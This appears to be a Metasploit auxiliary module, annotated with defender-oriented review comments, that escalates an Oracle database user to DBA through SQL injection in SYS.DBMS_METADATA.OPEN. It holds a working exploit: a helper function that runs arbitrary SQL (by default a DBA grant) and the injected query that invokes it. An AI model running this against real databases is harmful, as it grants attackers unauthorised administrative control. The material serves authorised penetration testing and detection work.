GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module that, per its own description, escalates an Oracle DB user
# to DBA through a SQL injection in SYS.DBMS_METADATA.OPEN.
#
# check_dependencies and prepare_exec are not defined in this file; they
# presumably come from the Msf::Exploit::ORACLE mixin -- confirm there.
#
# Review notes (defender view, all taken from the code below):
# - The run needs an account that can create a function in its own schema,
#   so withholding that privilege from accounts that do not need it removes
#   the precondition this module relies on.
# - The helper function is dropped on one error path only. After any other
#   outcome a randomly named function whose body is a single
#   `execute immediate` stays behind in the DBUSER schema.
# - 'SideEffects' declares IOC_IN_LOGS: if statement auditing is enabled, the
#   CREATE FUNCTION, the statement in the SQL option (a DBA grant by default)
#   and the DROP FUNCTION are the events to look for.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers the module metadata and its single option, SQL.
  #
  # @param info [Hash] metadata passed in by the framework and merged by
  #   update_info with the values below
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',
        'Description' => %q{
          This module will escalate a Oracle DB user to DBA by exploiting an sql injection
          bug in the SYS.DBMS_METADATA.OPEN package/function.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        # NOTE(review): the only reference is the project home page. No CVE or
        # vendor advisory is cited, so the affected versions and the fixing
        # patch cannot be determined from this file.
        'References' => [
          [ 'URL', 'http://www.metasploit.com' ],
        ],
        'DisclosureDate' => '2008-01-05',
        # Declared by the author: the target service should not crash, traces
        # are left in logs, and no reliability rating is given.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        # NOTE(review): the default is interpolated while initialize runs, so
        # it presumably captures whatever DBUSER holds at load time rather
        # than a value set later -- confirm against the framework.
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
      ]
    )
  end

  # Creates a helper function in the DBUSER schema, passes a call to it inside
  # the argument of sys.dbms_metadata.open, and drops the helper if the
  # expected error comes back.
  #
  # Returns early, doing nothing, when check_dependencies is falsy.
  def run
    return if !check_dependencies

    # Random alphabetic name for the helper function; the 1..10 range is the
    # length argument.
    name = Rex::Text.rand_text_alpha(1..10)

    # PL/SQL for the helper: declared `authid current_user` with
    # `pragma autonomous_transaction`, it runs the SQL option through
    # `execute immediate` and returns an empty string. DBUSER and SQL are
    # interpolated as given; nothing here quotes or validates them.
    function = "
      create or replace function #{datastore['DBUSER']}.#{name} return varchar2
      authid current_user is pragma autonomous_transaction;
      begin
      execute immediate '#{datastore['SQL']}';
      return '';
      end;
      "

    # Query that hands sys.dbms_metadata.open a string argument with a
    # concatenated call to the helper embedded in it. Presumably the package
    # evaluates that call with its owner's privileges, which is what the
    # description calls the injection -- not verifiable from this file.
    package = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{name}()||''') from dual"

    # NOTE(review): the drop is not schema-qualified, unlike the create above.
    clean = "drop function #{name}"

    print_status('Sending function...')
    prepare_exec(function)

    begin
      print_status('Attempting sql injection on SYS.DBMS_METADATA.OPEN...')
      prepare_exec(package)
    rescue ::OCIError => e
      # Cleanup runs only for this one error text, presumably the error a
      # completed run produces. Any other OCIError is discarded without a
      # message, and a call that raises nothing leaves the helper in place.
      if (e.to_s =~ /ORA-24374: define not done before fetch or execute and fetch/)
        print_status("Removing function '#{name}'...")
        prepare_exec(clean)
      end
    end
  end
end